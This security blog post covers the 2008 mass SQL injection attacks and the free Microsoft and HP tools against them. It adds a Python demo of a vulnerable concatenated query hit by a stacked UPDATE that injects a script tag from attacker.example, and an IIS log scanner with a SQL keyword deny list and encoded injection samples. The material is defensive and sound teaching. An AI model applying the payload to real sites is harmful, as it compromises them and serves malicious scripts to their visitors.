Microsoft / HP Team Up Against SQL Attacks
Not sure it's unprecedented, but it's certainly very rare. Microsoft has released a security advisory regarding the ongoing SQL injection attacks that have compromised millions of Web pages over the past six months. As part of the initiative, Microsoft also approached HP to create a scanning tool to assist Web developers in checking their own sites for susceptibility to the attacks.

The result is Scrawlr, a free tool that mimics the methods used by one of the attack tools behind many of the SQL injection attacks. (That attack tool is discussed in detail in this SANS Diary entry.) Essentially, Scrawlr crawls and indexes the site as a search spider would (the attackers are using search engines to discover susceptible sites). Scrawlr then attempts to enumerate all the tables matching specific criteria and render the exploit using the same methods employed by the automated SQL injection attack tool. Finally, Scrawlr extracts the names of all the user tables (verbosely) to confirm that the injection actually succeeded, which keeps false positives to a minimum before a result is flagged. Scrawlr isn't intended as a replacement for tools such as Absinthe, Burp, or SQL Power Injector; its sole purpose is to provide Web developers with a free, easy way to check their sites for susceptibility to the specific SQL injection attacks carried out by this specific attack tool.
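The root cause the attack tool preys on is the classic ASP pattern of concatenating a request parameter straight into a SQL string, so that a stacked statement after a semicolon runs too. The following is an added example written for this post, not code from Microsoft, HP or the SANS diary: it reproduces that pattern in Python against an in-memory SQLite database, stacks a constructed, simplified payload of the same shape (append a remote script tag to a text column), and shows the same lookup with a bound parameter, where the payload is never parsed as SQL. The table, rows, script host and payload are all constructed for illustration; SQLite has no sysobjects or cursors, so the payload hits one table rather than iterating over every user table as the real one did, and sqlite3's executescript() stands in for SQL Server's batch execution.

```python
import sqlite3

SCRIPT_TAG = '<script src="http://attacker.example/x.js"></script>'  # placeholder host

# Constructed, simplified payload with the shape of the mass attacks: end the
# intended statement, then stack an UPDATE that appends a remote script tag to
# a text column. The real payloads hex-encoded the UPDATE, wrapped it in
# DECLARE/CAST/EXEC, looped over every user table with a cursor on
# sysobjects/syscolumns, and ended with '--' to comment out any trailing SQL.
# SQLite has none of those, so this one hits a single known table.
PAYLOAD = "1;UPDATE news SET body = body || '" + SCRIPT_TAG + "'"


def seed_db() -> sqlite3.Connection:
    """Constructed stand-in for a site's content database (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'Welcome', '<p>Hello</p>');
        INSERT INTO news VALUES (2, 'Update', '<p>More news</p>');
        """
    )
    return conn


def render_page(conn: sqlite3.Connection) -> str:
    """What the site emits: every stored body, unescaped, as those ASP pages did."""
    rows = conn.execute("SELECT body FROM news ORDER BY id").fetchall()
    return "\n".join(body for (body,) in rows)


def fetch_article_vulnerable(conn: sqlite3.Connection, raw_id: str) -> None:
    """Classic ASP pattern: "SELECT ... WHERE id=" & Request.QueryString("id")."""
    sql = "SELECT title, body FROM news WHERE id = " + raw_id
    # ADO hands the whole string to SQL Server, which runs it as a batch, so a
    # statement stacked after ';' executes too. sqlite3's execute() refuses
    # multi-statement strings, so executescript() stands in for the batch.
    conn.executescript(sql)


def fetch_article_safe(conn: sqlite3.Connection, raw_id: str) -> list:
    """Same lookup with a bound parameter: the value is data, never parsed as SQL."""
    return conn.execute(
        "SELECT title, body FROM news WHERE id = ?", (raw_id,)
    ).fetchall()


def demo() -> dict:
    """Run the payload through both code paths on fresh databases."""
    vuln = seed_db()
    fetch_article_vulnerable(vuln, PAYLOAD)
    safe = seed_db()
    safe_rows = fetch_article_safe(safe, PAYLOAD)
    return {
        "vulnerable_page": render_page(vuln),  # every article now carries the tag
        "safe_rows": safe_rows,                # [] : no row has that id
        "safe_page": render_page(safe),        # untouched
    }


if __name__ == "__main__":
    result = demo()
    print("vulnerable site now serves:\n" + result["vulnerable_page"])
    print("parameterised lookup returned:", result["safe_rows"])
```

Note that the safe version needs no blacklist of keywords: parameter binding alone stops the stacked statement, and validating that `id` is an integer before the query is defence in depth, not the fix.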
For its part, Microsoft has released UrlScan v3.0 (beta), which restricts the kinds of requests and query strings Microsoft IIS will process. Bear in mind that a request filter is a mitigation, not a fix: it narrows what reaches the vulnerable code, but the injection flaw remains until the queries themselves are parameterized. To help with that, Microsoft has also released a source code analyzer that finds SQL injection vulnerabilities in classic ASP code. Used in conjunction with Scrawlr, these free tools should go a long way towards helping even novice Web site owners discover and remediate SQL injection susceptibilities. Hopefully the end result will be far fewer compromised websites and a corresponding decrease in the number of password stealers and backdoors being foisted onto users' systems when they browse the Web. In May 2008, the rate of Web-based exposure to password stealers and backdoors had increased 855% compared to May 2007, largely a result of these ongoing SQL injection attacks.
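Whether you deploy UrlScan or not, the same signature that a query-string filter would deny is also what to look for in the IIS logs of a site you suspect was hit. The example below is added here and is not part of the original post or of any Microsoft or HP tool: it URL-decodes each logged query string (the reason UrlScan 3.0 has to unescape before matching, since the attackers encoded spaces and punctuation), checks it against an assumed deny list written to mirror the intent of UrlScan's query-string rules rather than copied from its defaults, and looks for the hallmark of this wave, a hex literal CAST to a string and handed to EXEC. The log lines are constructed, and the hex blob is a harmless three-byte stand-in for the kilobytes of encoded UPDATE the real requests carried. It also shows why a bare substring deny list is noisy: "undeclared" contains "declare".

```python
import re
from urllib.parse import unquote_plus

# Assumed deny list written to mirror the purpose of UrlScan's query-string
# rules, not copied from any UrlScan default. Matched case-insensitively
# after decoding, on normalised whitespace.
DENY_SEQUENCES = ("declare", "cast(", "exec(", "set @", "varchar(")

# Hallmark of the 2008 wave: a hex literal CAST to a string, then executed.
HEX_CAST = re.compile(r"cast\(\s*0x[0-9a-f]+\s+as\s+n?varchar", re.IGNORECASE)

# Constructed IIS W3C-style lines, not real traffic. Fields:
# date time cs-method cs-uri-stem cs-uri-query sc-status
# 0x414243 ("ABC") stands in for the multi-kilobyte encoded UPDATE.
SAMPLE_LOG = """\
2008-06-25 10:01:02 GET /news.asp id=123 200
2008-06-25 10:01:05 GET /search.asp q=undeclared+variable+error 200
2008-06-25 10:01:09 GET /news.asp id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x414243%20AS%20VARCHAR(4000));EXEC(@S);-- 200
2008-06-25 10:01:13 GET /news.asp id=1%3BDECLARE+%40S+NVARCHAR%284000%29%3BSET+%40S%3DCAST%280x414243+AS+NVARCHAR%284000%29%29%3BEXEC%28%40S%29%3B-- 200
2008-06-25 10:02:00 GET /default.asp - 200
"""


def decode_query(raw_query: str) -> str:
    """Decode once (as UrlScan's UnescapeQueryString does) and normalise."""
    decoded = unquote_plus(raw_query)
    return re.sub(r"\s+", " ", decoded).strip().lower()


def matched_sequences(raw_query: str) -> list:
    """What a plain substring deny list sees; a single hit alone is noisy."""
    query = decode_query(raw_query)
    return [seq for seq in DENY_SEQUENCES if seq in query]


def is_mass_sqli(raw_query: str) -> bool:
    """Flag on the hex-CAST signature, or on two or more deny sequences together."""
    query = decode_query(raw_query)
    return bool(HEX_CAST.search(query)) or len(matched_sequences(raw_query)) >= 2


def scan_log(log_text: str) -> list:
    """Return (time, uri-stem, matched sequences) for each flagged request."""
    flagged = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):  # W3C header lines start with '#'
            continue
        fields = line.split()
        if len(fields) < 6:
            continue
        _date, time, _method, stem, query, _status = fields[:6]
        if query == "-":  # IIS logs '-' when there is no query string
            continue
        if is_mass_sqli(query):
            flagged.append((time, stem, matched_sequences(query)))
    return flagged


if __name__ == "__main__":
    for time, stem, seqs in scan_log(SAMPLE_LOG):
        print(time, stem, "matched:", ", ".join(seqs))
```

Run against the sample, only the two requests carrying the DECLARE/CAST/EXEC batch are flagged; the search for "undeclared variable error" trips the substring list on "declare" but not the detector. A filter built on these sequences alone will still block some legitimate traffic, which is one more reason to treat it as a stopgap while the code is fixed.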

Mary Landesman